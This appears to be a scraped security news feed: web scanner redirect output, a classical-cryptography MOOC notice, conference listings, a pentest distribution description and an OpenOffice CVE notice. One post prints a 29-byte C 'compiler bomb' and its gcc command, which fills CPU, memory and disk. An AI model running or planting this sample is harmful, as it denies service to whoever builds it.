[I] Found Redirect: 'https://adamcaudill.com/buy/ -> 'https://adamcaudill.com/2006/12/19/buying-a-car/'
[I] Found Redirect: 'https://adamcaudill.com/c/ -> 'https://adamcaudill.com/2009/10/03/cancel-godaddys-domain-privacy/'
[I] Found Redirect: 'https://adamcaudill.com/ca/ -> 'https://adamcaudill.com/2009/10/03/cancel-godaddys-domain-privacy/'
[I] Found Redirect: 'https://adamcaudill.com/can/ -> 'https://adamcaudill.com/2009/10/03/cancel-godaddys-domain-privacy/'
[I] Found Redirect: 'https://adamcaudill.com/cc/ -> 'https://adamcaudill.com/ccsrch/'
[I] Found Redirect: 'https://adamcaudill.com/ccs/ -> 'https://adamcaudill.com/ccsrch/'
[I] Found Redirect: 'https://adamcaudill.com/cgi-bin// -> 'https://adamcaudill.com/cgi-bin/'
[I] Found Redirect: 'https://adamcaudill.com/ch/ -> 'https://adamcaudill.com/2010/08/06/christopher-adam-caudill-6lbs-7oz-born-822010/'
[I] Found Redirect: 'https://adamcaudill.com/com/ -> 'https://adamcaudill.com/2006/03/11/common-sense-email/'
[I] Found Redirect: 'https://adamcaudill.com/common/ -> 'https://adamcaudill.com/2006/03/11/common-sense-email/'
[I] Found Redirect: 'https://adamcaudill.com/con/ -> 'https://adamcaudill.com/2003/11/11/conexant-formerly-rockwell-softmodem-hsf-modem/'
[I] Found Redirect: 'https://adamcaudill.com/contact/ -> '/pgp/'
[I] Found Redirect: 'https://adamcaudill.com/crypto/ -> 'https://adamcaudill.com/2016/03/12/crypto-crisis-fear-over-freedom/'
[I] Found Redirect: 'https://adamcaudill.com/d/ -> 'https://adamcaudill.com/2006/06/02/data-theft-its-happened-again/'
[I] Found Redirect: 'https://adamcaudill.com/dat/ -> 'https://adamcaudill.com/2006/06/02/data-theft-its-happened-again/'
[I] Found Redirect: 'https://adamcaudill.com/data/ -> 'https://adamcaudill.com/2006/06/02/data-theft-its-happened-again/'
[I] Found Redirect: 'https://adamcaudill.com/de/ -> 'https://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/'
[I] Found Redirect: 'https://adamcaudill.com/dec/ -> 'https://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/'
[I] Found Redirect: 'https://adamcaudill.com/detail/ -> 'https://adamcaudill.com/2006/09/03/detailed-css-changes-in-ie7/'
[I] Found Redirect: 'https://adamcaudill.com/dev/ -> 'https://adamcaudill.com/2016/08/17/developers-placing-trust-in-strangers/'
[I] Found Redirect: 'https://adamcaudill.com/devel/ -> 'https://adamcaudill.com/2016/08/17/developers-placing-trust-in-strangers/'
[I] Found Redirect: 'https://adamcaudill.com/develop/ -> 'https://adamcaudill.com/2016/08/17/developers-placing-trust-in-strangers/'
[I] Found Redirect: 'https://adamcaudill.com/developer/ -> 'https://adamcaudill.com/2016/08/17/developers-placing-trust-in-strangers/'
[I] Found Redirect: 'https://adamcaudill.com/developers/ -> 'https://adamcaudill.com/2016/08/17/developers-placing-trust-in-strangers/'
[I] Found Redirect: 'https://adamcaudill.com/development/ -> 'https://adamcaudill.com/2006/04/11/development-abstraction/'
[I] Found Redirect: 'https://adamcaudill.com/do/ -> 'https://adamcaudill.com/2013/07/04/do-one-thing-right/'
[I] Found Redirect: 'https://adamcaudill.com/e/ -> 'https://adamcaudill.com/2006/03/17/end-on-an-era/'
[I] Found Redirect: 'https://adamcaudill.com/en/ -> 'https://adamcaudill.com/2006/03/17/end-on-an-era/'
[I] Found Redirect: 'https://adamcaudill.com/error/ -> 'https://adamcaudill.com/2011/05/16/errors-on-gem-install-mysql2/'
[I] Found Redirect: 'https://adamcaudill.com/errors/ -> 'https://adamcaudill.com/2011/05/16/errors-on-gem-install-mysql2/'
[I] Found Redirect: 'https://adamcaudill.com/event/ -> 'https://adamcaudill.com/2006/09/24/eventargs-no-need-to-pass-a-new-instance/'
[I] Found Redirect: 'https://adamcaudill.com/f/ -> 'https://adamcaudill.com/2011/05/14/facebook-scams/'
[I] Found: 'https://adamcaudill.com/feed/'
[I] Found: 'https://adamcaudill.com/files/'
[I] Found Redirect: 'https://adamcaudill.com/firefox/ -> 'https://adamcaudill.com/2006/09/17/firefox-toys-errorzilla/'
[I] Found Redirect: 'https://adamcaudill.com/first/ -> 'https://adamcaudill.com/2013/03/26/first-do-no-harm-developers-and-bad-apis/'
[I] Found Redirect: 'https://adamcaudill.com/fr/ -> 'https://adamcaudill.com/2007/02/06/from-outlook-to-gmail-to-the-bat/'
[I] Found Redirect: 'https://adamcaudill.com/g/ -> 'https://adamcaudill.com/2003/11/26/get-cpu-speed/'
[I] Found Redirect: 'https://adamcaudill.com/get/ -> 'https://adamcaudill.com/2003/11/26/get-cpu-speed/'
[I] Found Redirect: 'https://adamcaudill.com/go/ -> 'https://adamcaudill.com/2011/01/12/google-chrome-and-h-264/'
[I] Found Redirect: 'https://adamcaudill.com/google/ -> 'https://adamcaudill.com/2011/01/12/google-chrome-and-h-264/'
[I] Found Redirect: 'https://adamcaudill.com/gp/ -> 'https://adamcaudill.com/2012/05/13/gpg4win-idea/'
[I] Found Redirect: 'https://adamcaudill.com/h/ -> 'https://adamcaudill.com/2011/05/21/happy-20th-birthday-visual-basic/'
[I] Found Redirect: 'https://adamcaudill.com/holiday/ -> 'https://adamcaudill.com/2006/12/23/holiday-schwag/'
[I] Found Redirect: 'https://adamcaudill.com/home/ -> 'https://adamcaudill.com/'
[I] Found Redirect: 'https://adamcaudill.com/host/ -> 'https://adamcaudill.com/2011/04/11/hosting-change/'
[I] Found Redirect: 'https://adamcaudill.com/hosting/ -> 'https://adamcaudill.com/2011/04/11/hosting-change/'
[I] Found Redirect: 'https://adamcaudill.com/how/ -> 'https://adamcaudill.com/2006/02/26/how-it-projects-really-work/'
[I] Found Redirect: 'https://adamcaudill.com/hp/ -> 'https://adamcaudill.com/2012/04/23/hp-folio-13/'
[I] Found Redirect: 'https://adamcaudill.com/i/ -> 'https://adamcaudill.com/2007/02/10/i-love-my-job/'
[I] Found Redirect: 'https://adamcaudill.com/ie/ -> 'https://adamcaudill.com/2007/01/10/ie-developer-toolbar/'
[I] Found Redirect: 'https://adamcaudill.com/in/ -> 'https://adamcaudill.com/2006/07/07/in-comes-the-schwag/'
[I] Found Redirect: 'https://adamcaudill.com/install/ -> 'https://adamcaudill.com/2006/11/18/installing-vista/'
[I] Found Redirect: 'https://adamcaudill.com/internet/ -> 'https://adamcaudill.com/2006/05/27/internet-explorer-7/'
[I] Found Redirect: 'https://adamcaudill.com/it/ -> 'https://adamcaudill.com/2006/02/26/its-official-ie7-is-cool/'
[I] Found Redirect: 'https://adamcaudill.com/j/ -> 'https://adamcaudill.com/2014/07/23/jumping-through-hoops-dot-dot-dot/'
[I] Found Redirect: 'https://adamcaudill.com/jump/ -> 'https://adamcaudill.com/2014/07/23/jumping-through-hoops-dot-dot-dot/'
[I] Found Redirect: 'https://adamcaudill.com/k/ -> 'https://adamcaudill.com/2006/09/16/kill-capslock/'
[I] Found Redirect: 'https://adamcaudill.com/l/ -> 'https://adamcaudill.com/lasers/'
[I] Found Redirect: 'https://adamcaudill.com/link/ -> 'https://adamcaudill.com/2012/06/06/linkedin-a-little-common-sense/'
[I] Found Redirect: 'https://adamcaudill.com/m/ -> 'https://adamcaudill.com/2006/09/23/make-xp-pretty/'
[I] Found Redirect: 'https://adamcaudill.com/microsoft/ -> 'https://adamcaudill.com/2007/01/21/microsoft-mice-another-reason-to-love-them/'
[I] Found Redirect: 'https://adamcaudill.com/mini/ -> 'https://adamcaudill.com/2012/05/13/minipwner/'
[I] Found Redirect: 'https://adamcaudill.com/monitor/ -> 'https://adamcaudill.com/2012/06/10/monitor-iphone-http-s-traffic-with-fiddler/'
[I] Found Redirect: 'https://adamcaudill.com/my/ -> 'https://adamcaudill.com/2012/03/31/my-5-minutes-of-infamy/'
[I] Found Redirect: 'https://adamcaudill.com/n/ -> 'https://adamcaudill.com/2011/02/11/need-a-cheap-phone-charger-quick-buy-a-tracfone/'
[I] Found Redirect: 'https://adamcaudill.com/ne/ -> 'https://adamcaudill.com/2011/02/11/need-a-cheap-phone-charger-quick-buy-a-tracfone/'
[I] Found Redirect: 'https://adamcaudill.com/net/ -> 'https://adamcaudill.com/2006/11/08/net-framework-30-released/'
[I] Found Redirect: 'https://adamcaudill.com/new/ -> 'https://adamcaudill.com/2016/01/01/new-atheism-the-philosophy-of-atheism/'
[I] Found Redirect: 'https://adamcaudill.com/no/ -> 'https://adamcaudill.com/2006/10/05/not-not-a-good-idea/'
[I] Found Redirect: 'https://adamcaudill.com/o/ -> 'https://adamcaudill.com/2006/06/17/of-victory-and-pair-programming/'
[I] Found Redirect: 'https://adamcaudill.com/of/ -> 'https://adamcaudill.com/2006/06/17/of-victory-and-pair-programming/'
[I] Found Redirect: 'https://adamcaudill.com/on/ -> 'https://adamcaudill.com/2010/06/19/on-hiring/'
[I] Found Redirect: 'https://adamcaudill.com/open/ -> 'https://adamcaudill.com/2007/02/02/opendns/'
[I] Found Redirect: 'https://adamcaudill.com/p/ -> 'https://adamcaudill.com/2003/10/31/pagesource/'
[I] Found Redirect: 'https://adamcaudill.com/page/ -> 'https://adamcaudill.com/2003/10/31/pagesource/'
[I] Found Redirect: 'https://adamcaudill.com/page2/ -> 'https://adamcaudill.com/page/2/'
[I] Found Redirect: 'https://adamcaudill.com/pages/ -> 'https://adamcaudill.com/2003/10/31/pagesource/'
[I] Found Redirect: 'https://adamcaudill.com/pass/ -> 'https://adamcaudill.com/2013/05/07/password-hashing-no-silver-bullets/'
[I] Found Redirect: 'https://adamcaudill.com/passw/ -> 'https://adamcaudill.com/2013/05/07/password-hashing-no-silver-bullets/'
[I] Found Redirect: 'https://adamcaudill.com/passwor/ -> 'https://adamcaudill.com/2013/05/07/password-hashing-no-silver-bullets/'
[I] Found Redirect: 'https://adamcaudill.com/password/ -> 'https://adamcaudill.com/2013/05/07/password-hashing-no-silver-bullets/'
[I] Found: 'https://adamcaudill.com/pgp/'
[I] Found: 'https://adamcaudill.com/photo/'
[I] Found Redirect: 'https://adamcaudill.com/php/ -> 'https://adamcaudill.com/2005/03/01/phpbb-2-0-13-released-dumbss-coders-strike-again/'
[I] Found Redirect: 'https://adamcaudill.com/pl/ -> 'https://adamcaudill.com/2016/05/01/plsql-developer-http-to-command-execution/'
[I] Found Redirect: 'https://adamcaudill.com/pls/ -> 'https://adamcaudill.com/2016/05/01/plsql-developer-http-to-command-execution/'
[I] Found Redirect: 'https://adamcaudill.com/power/ -> 'https://adamcaudill.com/2006/11/15/power-users-rejoice/'
[I] Found Redirect: 'https://adamcaudill.com/pr/ -> 'https://adamcaudill.com/2008/12/21/programmers-are-expensive/'
[I] Found Redirect: 'https://adamcaudill.com/pro/ -> 'https://adamcaudill.com/2008/12/21/programmers-are-expensive/'
[I] Found Redirect: 'https://adamcaudill.com/prog/ -> 'https://adamcaudill.com/2008/12/21/programmers-are-expensive/'
[I] Found Redirect: 'https://adamcaudill.com/program/ -> 'https://adamcaudill.com/2008/12/21/programmers-are-expensive/'
[I] Found Redirect: 'https://adamcaudill.com/q/ -> 'https://adamcaudill.com/2012/04/05/quickpacket-hosting/'
[I] Found Redirect: 'https://adamcaudill.com/r/ -> 'https://adamcaudill.com/2011/01/28/rails-3-dreamhost-ps/'
[I] Found Redirect: 'https://adamcaudill.com/random/ -> 'https://adamcaudill.com/2005/02/28/random-user-agent-in-vb-net/'
[I] Found Redirect: 'https://adamcaudill.com/read/ -> 'https://adamcaudill.com/reading/'
[I] Found Redirect: 'https://adamcaudill.com/reg/ -> 'https://adamcaudill.com/2003/10/26/register-activex-typelibs/'
[I] Found Redirect: 'https://adamcaudill.com/register/ -> 'https://adamcaudill.com/2003/10/26/register-activex-typelibs/'
[I] Found Redirect: 'https://adamcaudill.com/religion/ -> 'https://adamcaudill.com/2015/01/12/religion-free-speech-freedom-from-offense/'
[I] Found: 'https://adamcaudill.com/resume/'
[I] Found Redirect: 'https://adamcaudill.com/rss/ -> 'https://adamcaudill.com/feed/'
[I] Found Redirect: 'https://adamcaudill.com/rss2/ -> 'https://adamcaudill.com/feed/'
[I] Found Redirect: 'https://adamcaudill.com/ru/ -> 'https://adamcaudill.com/2006/09/17/running-regedit-as-system/'
[I] Found Redirect: 'https://adamcaudill.com/run/ -> 'https://adamcaudill.com/2006/09/17/running-regedit-as-system/'
[I] Found Redirect: 'https://adamcaudill.com/s/ -> 'https://adamcaudill.com/2016/05/22/seamless-phishing/'
[I] Found Redirect: 'https://adamcaudill.com/se/ -> 'https://adamcaudill.com/2016/05/22/seamless-phishing/'
[I] Found Redirect: 'https://adamcaudill.com/secure/ -> 'https://adamcaudill.com/2010/02/01/secure-password-storage/'
[I] Found Redirect: 'https://adamcaudill.com/security/ -> 'https://adamcaudill.com/2014/03/23/security-by-buzzword-why-i-dont-support-ensafer/'
[I] Found Redirect: 'https://adamcaudill.com/server/ -> 'https://adamcaudill.com/2006/03/25/server-move/'
[I] Found Redirect: 'https://adamcaudill.com/set/ -> 'https://adamcaudill.com/2003/10/31/setfocusbycaption/'
[I] Found Redirect: 'https://adamcaudill.com/simple/ -> 'https://adamcaudill.com/2003/11/26/simple-ini-api/'
[I] Found Redirect: 'https://adamcaudill.com/site/ -> 'https://adamcaudill.com/2006/10/30/site-updates/'
[I] Found Redirect: 'https://adamcaudill.com/sp/ -> 'https://adamcaudill.com/2006/12/19/spam-gmail/'
[I] Found Redirect: 'https://adamcaudill.com/spam/ -> 'https://adamcaudill.com/2006/12/19/spam-gmail/'
[I] Found Redirect: 'https://adamcaudill.com/st/ -> 'https://adamcaudill.com/2009/07/18/start-up-tools-microsoft-bizspark/'
[I] Found Redirect: 'https://adamcaudill.com/star/ -> 'https://adamcaudill.com/2009/07/18/start-up-tools-microsoft-bizspark/'
[I] Found Redirect: 'https://adamcaudill.com/start/ -> 'https://adamcaudill.com/2009/07/18/start-up-tools-microsoft-bizspark/'
[I] Found Redirect: 'https://adamcaudill.com/stat/ -> 'https://adamcaudill.com/2010/07/30/state-of-the-virus-art/'
[I] Found Redirect: 'https://adamcaudill.com/state/ -> 'https://adamcaudill.com/2010/07/30/state-of-the-virus-art/'
[I] Found Redirect: 'https://adamcaudill.com/super/ -> 'https://adamcaudill.com/2006/04/07/superstars-monkeys/'
[I] Found Redirect: 'https://adamcaudill.com/sw/ -> 'https://adamcaudill.com/2009/06/13/switching-hosts-again/'
[I] Found Redirect: 'https://adamcaudill.com/t/ -> 'https://adamcaudill.com/2007/01/21/task-management-with-tasks/'
[I] Found Redirect: 'https://adamcaudill.com/task/ -> 'https://adamcaudill.com/2007/01/21/task-management-with-tasks/'
[I] Found Redirect: 'https://adamcaudill.com/technology/ -> '/'
[I] Found Redirect: 'https://adamcaudill.com/tool/ -> 'https://adamcaudill.com/tools/'
[I] Found: 'https://adamcaudill.com/tools/'
[I] Found Redirect: 'https://adamcaudill.com/u/ -> 'https://adamcaudill.com/2007/03/22/under-the-weather/'
[I] Found Redirect: 'https://adamcaudill.com/up/ -> 'https://adamcaudill.com/2012/10/07/upek-windows-password-decryption/'
[I] Found Redirect: 'https://adamcaudill.com/us/ -> 'https://adamcaudill.com/2006/07/08/useful-notepad-tip/'
[I] Found Redirect: 'https://adamcaudill.com/v/ -> 'https://adamcaudill.com/2006/05/10/valleyschwag/'
[I] Found Redirect: 'https://adamcaudill.com/var/ -> 'https://adamcaudill.com/2005/09/26/varticles/'
[I] Found Redirect: 'https://adamcaudill.com/vb/ -> 'https://adamcaudill.com/2006/04/02/vb-the-dumbing-of-a-great-language/'
[I] Found Redirect: 'https://adamcaudill.com/vi/ -> 'https://adamcaudill.com/2013/10/23/vicidial-multiple-vulnerabilities/'
[I] Found Redirect: 'https://adamcaudill.com/vista/ -> 'https://adamcaudill.com/2006/11/16/vista-available-via-msdn/'
[I] Found Redirect: 'https://adamcaudill.com/w/ -> 'https://adamcaudill.com/2006/11/28/want-a-free-copy-of-vista/'
[I] Found Redirect: 'https://adamcaudill.com/web/ -> 'https://adamcaudill.com/2006/05/17/web-developer-toolbar-menu-for-opera/'
[I] Found Redirect: 'https://adamcaudill.com/what/ -> 'https://adamcaudill.com/2006/04/24/what-a-surprise/'
[I] Found Redirect: 'https://adamcaudill.com/why/ -> 'https://adamcaudill.com/2011/10/15/why-cringely-is-wrong-about-java/'
[I] Found Redirect: 'https://adamcaudill.com/wiki/ -> 'https://adamcaudill.com/2010/12/01/wikileaks-biggest-problem-julian-assange/'
[I] Found Redirect: 'https://adamcaudill.com/win/ -> 'https://adamcaudill.com/2007/03/01/windows-vista-user-experience-guidelines/'
[I] Found Redirect: 'https://adamcaudill.com/windows/ -> 'https://adamcaudill.com/2007/03/01/windows-vista-user-experience-guidelines/'
[I] Found Redirect: 'https://adamcaudill.com/wink/ -> 'https://adamcaudill.com/2006/04/15/wink-20/'
[I] Found Redirect: 'https://adamcaudill.com/word/ -> 'https://adamcaudill.com/2006/07/30/wordpress-204/'
[I] Found Redirect: 'https://adamcaudill.com/wordpress/ -> 'https://adamcaudill.com/2006/07/30/wordpress-204/'
[I] Found Redirect: 'https://adamcaudill.com/work/ -> 'https://adamcaudill.com/2008/12/08/working-late-again/'
[I] Found: 'https://adamcaudill.com/wp-content/'
[I] Found: 'https://adamcaudill.com/wp-includes/'
[I] Found Redirect: 'https://adamcaudill.com/x/ -> 'https://adamcaudill.com/2007/01/25/xceed-datagrid-for-wpf-released-free/'
[I] Found Redirect: 'https://adamcaudill.com/xml/ -> 'https://adamcaudill.com/2006/09/03/xml-notepad-2006/'
[I] Found Redirect: 'https://adamcaudill.com/y/ -> 'https://adamcaudill.com/2012/07/12/yahoos-associated-content-hacked/'
[I] Found Redirect: 'https://adamcaudill.com/yahoo/ -> 'https://adamcaudill.com/2012/07/12/yahoos-associated-content-hacked/'
[I] Found Redirect: 'https://adamcaudill.com/z/ -> 'https://adamcaudill.com/2004/12/18/zipsight-2004-1-released/'
[I] Found Redirect: 'https://adamcaudill.com/zip/ -> 'https://adamcaudill.com/2004/12/18/zipsight-2004-1-released/'
[I] Found Redirect: 'https://adamcaudill.com/zips/ -> 'https://adamcaudill.com/2004/12/18/zipsight-2004-1-released/'

[I] Meta Generator: WordPress 4.6.1
Scan complete.

About The Output
You'll notice that most lines begin with a letter in a bracket, this is to tell you how to interpret the result at a glance. There are four possible values:
  • [I] - This indicates that the line is informational, and doesn't necessarily indicate a security issue.
  • [W] - This is a Warning, which means that it could be an issue, or could expose useful information. These need to be evaluated on a case-by-case basis to determine the impact.
  • [V] - This is a Vulnerability, it indicates an issue that is known to be an issue, and needs to be addressed.
  • [E] - This indicates that an error occurred, sometimes these are serious and indicate an issue with your environment, the target server, or the application. In other cases, they may just be informational to let you know that something didn't go as planned.
The indicator used may change over time based on new research or better detection techniques. In all cases, results should be carefully evaluated within the context of the application, how it's used, and what threats apply. The indicator is guidance, a hint if you will, it's up to you to determine the real impact.



Via:www.kitploit.com

Octava lección "Algoritmos de cifra por sustitución monoalfabética" del MOOC Crypt4you

$
0
0
Se ha publicado la octava lección del MOOCIntroducción a la seguridad informática y criptografía clásica, de título "Algoritmos de cifra por sustitución monoalfabética" correspondiente al Tema IV: "Algoritmos de Cifra Clásica".

En esta octava lección del MOOC, iniciamos el estudio de los sistemas de cifra por sustitución. Como ya sabes, son los que han tenido un mayor desarrollo en la historia de la criptografía clásica. La lección 8 está dedicada a la cifra monográmica (ciframos letra a letra) y monoalfabética (con un único alfabeto de cifrado) y dejaremos para la lección 9 la cifra monográmica polialfabética. Estudiaremos las operaciones de cifrado, descifrado y criptoanálisis de sistemas de cifra por desplazamiento puro, entre ellos el famoso sistema de cifra del César, sistemas de cifra por decimación pura y sistemas de cifra por multiplicación y adición, más conocida como cifra afín. Vas a comprobar que, además de cifrar y descifrar, la acción de un ataque elegante al criptograma o criptoanálisis basado en la redundancia del lenguaje, será muy sencilla.

En esta lección vamos a utilizar el software para prácticas de criptografía Criptoclásicos v2.1, desarrollado por D. Juan Contreras Rubio. Por favor, comprueba desde ese enlace de descarga que tienes instalada la última versión, dado que se han hecho algunas actualizaciones.

La lección tiene como elementos multimedia de apoyo las píldoras formativas Thot 16 "¿Qué es la cifra del César?", Thot 17 "¿Qué es la cifra afín?" y Thot 18 "¿Cómo se ataca la cifra por sustitución monoalfabética?"

Así mismo, se han publicado en las redes sociales de Twitter y Facebook del MOOC Crypt4you las soluciones al test de la lección anterior número 7; en el caso de Facebook, las respuestas están además comentadas.


La siguiente entrega del MOOC Crypt4you es la Lección 9 Algoritmos de cifra clásica por sustitución polialfabética. Terminado el MOOC, se publicará un examen de tipo teórico y práctico que no se evaluará ni dará derecho, de momento, a certificación.

Más información:

Introducción a la seguridad informática y criptografía clásica
Tema IV: Algoritmos de cifra clásica
Lección 8: Algoritmos de cifra por sustitución monoalfabética

Crypt4you

Estadísticas acumuladas de las lecciones del MOOC Crypt4you

una-al-dia (24/02/2016) Nuevo MOOC en Crypt4you sobre "seguridad informática y criptografía clásica"

una-al-dia (01/03/2016) Publicada la segunda lección del MOOC Crypt4you "Introducción a la seguridad informática y criptografía clásica"

una-al-dia (15/03/2016) Tercera lección del MOOC Crypt4you "Introducción a la seguridad informática y criptografía clásica"

una-al-dia (03/04/2016) Cuarta lección del MOOC Crypt4you "Introducción a la seguridad informática y criptografía clásica"

una-al-dia (17/04/2016) Quinta lección del MOOC Crypt4you "Introducción a la seguridad informática y criptografía clásica"

una-al-dia (11/01/2015) Publicadas las píldoras formativas Thoth 13, 14 y 15 dedicadas a los cifrados clásicos por sustitución y por permutación

una-al-dia (29/05/2016) Sexta lección del MOOC Crypt4you "Introducción a la seguridad informática y criptografía clásica"

una-al-dia (20/06/2016) Séptima lección del MOOC Crypt4you "Introducción a la seguridad informática y criptografía clásica"


Dr. Jorge Ramió; Dr. Alfonso Muñoz
Directores del MOOC Crypt4you 

Via:unaaldia.hispasec.com

29 bytes de código que se convierten en 16 GBs al compilar (compiler bomb)

$
0
0
Probablemente ya conozcáis las bombas zip, las bombas xml, etc., por decirlo de una manera sencilla, ficheros (relativamente) pequeños que producen una salida de enorme tamaño cuando son interpretados por el software nativo. El resultado, si se tiene mala leche, es provocar una auténtica denegación de servicio en la máquina que se ejecuta.


Hace unos meses en un foro de StackExchange lanzaron un reto para crear una de estas bombas abusando de un compilador. El ganador, el código más pequeño capaz de generar la salida mayor al compilarse.

Y bueno, un tal Digital Trauma presentó tan sólo 29 bytes de código C que al compilarse generar un ejecutable de... 17,179,875,837 bytes (16 GB)!:

main[-1u]={1};

Como veis, se define la función main como un array grande o large de hasta 500000 elementos (unsigned int con el valor 0xffffffff) y se inicializa en el primer elemento. Esto hará que GCC almacene el array entero en el ejecutable resultante. Debido a que el array es mayor de 2GBs al compilarlo tendremos que especificar el flag -mcmodel=medium. Así que si ejecutamos:

gcc -mcmodel=medium cbomb.c -o cbomb

Veréis como se satura rápidamente la CPU, la memoria y el disco...:-O

Fuente: Build a Compiler Bomb

Via:www.hackplayers.com

Citas presenciales para Octubre: Eventos & Conferencias en España, Austria, Colombia, Argentina, Bolivia y Chile

$
0
0
Hace un par de días os dejé la lista de eventos y cursos online para Octubre, y ahora quiero dejaros la lista de las conferencias y charlas que hay por delante en las próximas dos semanas, que son una buena cantidad de ellos y seguro que hay alguno cerca, porque la lista es bien larga. Toma nota, y mira a ver si alguno te encaja para que puedas asistir, ya que se acerca el final del año y se ralentizará todo un poco después de este mes.

Figura 1: Citas presenciales en Octubre

La primera semana, que comienza hoy mismo, tienes el primer evento esta misma tarde. Yo iré a primera hora de la tarde a dar una charla sobre Cómo gestionar la seguridad de las apps móviles en la Universidad Europea de Madrid, en el Campus de Villaviciosa de Odón, dentro de las actividades del Master de Seguridad de la UEM en el que participo. Puedes apuntarte y asistir, que está abierto a todos. Creo que se retransmitirá por streaming, así que si es así, esta tarde os compartiré la URL por mi cuenta Twitter o el Canal Telegram de El lado del mal.
Mañana martes estaré en un acto privado con la compañía de seguros MGS para dar una charla en el museo Reina Sofía de Madrid dentro de los actos de su aniversario. Si te ha llegado la invitación, espero que te guste la jornada que hemos preparado para vosotros.

Figura 3: II MeetUP del OWASP Madrid Chapter

Ese mismo, en Madrid, tendrá lugar el II MeetUP del OWASP Chapter Madrid, con una agenda de un par de horas de duración con el objetivo de compartir experiencias sobre Chaos Monkey, con seguridad en Docker y algo de Google Dorking.

El miércoles 19 las actividades se centran en el entorno de Telefónica, donde tenemos el Industry Analyst Day y en el que vamos a participar en una jornada con analistas tecnológicos. También es un evento privado, pero si has recibido la invitación nos vemos por allí.
El jueves 20 la actividad se centra en el lanzamiento de la nueva unidad de Big Data en Telefónica. El evento será por la tarde, pero por la mañana tenemos rueda de prensa con periodistas para explicar el funcionamiento de esta unidad dentro de Telefónica. El evento tiene el registro abierto, y aunque el número de plazas que tenemos disponible es muy pequeño, aún puedes apuntarte.

Ese mismo día, en Chile, tiene lugar el comienzo de la CON8dot8 que organiza entre otros nuestro compañero Gabriel Bergel, y que tendrá ponentes de excepción con César Cerrudo,  Jaime Andrés Restrepo o Maxi Soler por citar algunos de los muchos ponentes que estarán el 20 y el 21 de Octubre en Chile.
El día 24 y 25 la conferencia 8dot8 se mueve a Bolivia, así que si estás cerca de La Paz esos días, no tienes excusa para perderte esta edición de las conferencias. No hay tantas oportunidades de ver a tan buenos ponentes en directo.
Mientras, el día 24 de Octubre tiene lugar el comienzo de la Big Data Week a nivel mundial, y en España, nuestra compañera Carme Artigas Brugal junto con Roger Magoulas, Sharon Sputz y René Baston encabezan una jornada en Madrid centrada en la innovación con el uso del Big Data, donde además de las charlas se estarán entregando los Data Science Awards que Telefónica a través de Synergic Partners, concede  a los mejores proyectos en este campo.

Esta misma jornada se traslada también el día 26 de Octubre a Barcelona, para que termine la Big Data Week en España con un Mega Meetup en el Mobile World Centre de Barcelona el jueves 27 a las 16:00 horas para los profesionales y amantes del mundo del Big Data al que te puedes apuntar.

También el día 24 de Octubre, pero en Viena (Austria), tendrá lugar el congreso ACM CCS (Association for Computing Machinery of Computer and Communications Security), donde ElevenPaths presenta un trabajo de investigación que ha realizado en conjunción con la Universidad Carlos III de Madrid.

Figura 7: ACM CSS 2016 en Viena

El día 25 por la mañana, justo antes de salir a Colombia, estaré como ponente en el Telco Data Analytics Europe que se realizará en el Hotel Meliá de Madrid, para hablar de nuestro trabajo en CDO y la nueva unidad de Big Data.


Ese día 26, ya en Colombia, tendré una agenda cargada ya que estaré por la mañana con mis compañeros de Telefónica Colombia y luego por la tarde daré en el Auditorio del Ministerio TIC de Colombia una charla sobre ciberseguridad solo para los CIOs de las entidades del estado.
Mientras tanto, en Buenos Aires, dará comienzo una nueva edición de la Ekoparty. No os tengo que decir mucho más de esta CON que se ha ganado el cariño de todos en el mundo, así que si tu agenda te lo permite, deberás pasar en Argentina los días 26, 27 y 28 de Octubre.

Yo permaneceré el día 27 en Colombia con una agenda apretada con clientes, periodistas y compañeros de Telefónica, para terminar el día 28 en el 10º Congreso de Prevención del Fraude y Seguriad que organiza Asobancaria. Ese día participaré con una ponencia, estaré en una mesa de debate y tendré un almuerzo en el evento con los asistentes.

Figura 9: 10º Congreso de Prevención del Fraude y Seguridad

Como podéis ver, la agenda para las próximas dos semanas es intensa como ella sola, y a mí personalmente me va a tocar estar en muchos rincones del mundo a la vez y en muchas charlas con cambios de registro, pero... ¿quién dijo miedo?

Saludos Malignos!

Via:www.elladodelmal.com

DracOS - Lightweight and Powerful Penetration Testing OS

$
0
0

Dracos Linux ( www.dracos-linux.org ) is the Linux operating system from Indonesian , open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering. Does not use a GUI-based tools-tools and just have the software using the CLI (command line interface) to perform its operations. Now Dracos currently already up to version 2.0 with the code name "Leak".

Screenshot

Teaser

As the target of development

Education
Dracos Linux is purposed as an educational,especially to recognize the operation system of linux and we respect ethical hacking.

Build from source
had always been built from codes instead of installer,this will stimulate users in indonesia to stay creative and to build the spirit of opensource.

Repository
even though proportionally based on codes,Dracos Linux still intends to construct the repository to build up the processes Like Venomizer

Heavy Control
We need to recognize this operating system Very Dificult Because Dracos in build from source code, thus forcing us to compile when installing a package or software, which of course will arise the possibility of system failure and other system vulnerabilities.

Always from terminal
None of every singel tool that was installed inside the OS uses GUI. CLI will always consider to particularly openbox to ease the users in need of multi terminal in applying Penetration Testing

Penetration Tools List
Link : http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing
  • Information Gathering
  • Vulnerability Assessment
  • Web Attack
  • Exploitation Testing
  • Privilege Escalation
  • Password Attack
  • Social Engineering
  • Man In The Middle Attack
  • Stress Testing
  • Wireless Attack
  • Maintaining Access
  • Forensics Tools
  • Reverse Engineering
  • Malware Analysis
  • Covering Track


Via:www.kitploit.com

Anunciadas vulnerabilidades en OpenOffice

$
0
0
Se han anunciado dos vulnerabilidades en OpenOffice que podría llegar a permitir la ejecución remota de código arbitrario.

Apache OpenOffice es una suite ofimática de código abierto y gratuita. Cuenta con aplicaciones de hojas de cálculo (Calc), procesador de textos (Writer), bases de datos (Base), presentaciones (Impress), gráficos vectorial (Draw), y creación y edición de fórmulas matemáticas (Math).

La primera vulnerabilidad, identificada como CVE-2016-6803, reside en el instalador de Apache OpenOffice para Windows por una ruta de búsqueda Windows sin comillas, lo que podría permitir la ejecución de software no deseado por una aplicación troyanizada.

Por otra parte, con CVE-2016-6804, otra vulnerabilidaden el instalador para Windows que podría permitir la carga de una dll falsa y de esa forma lograr ejecutar código arbitrario con privilegios elevados.

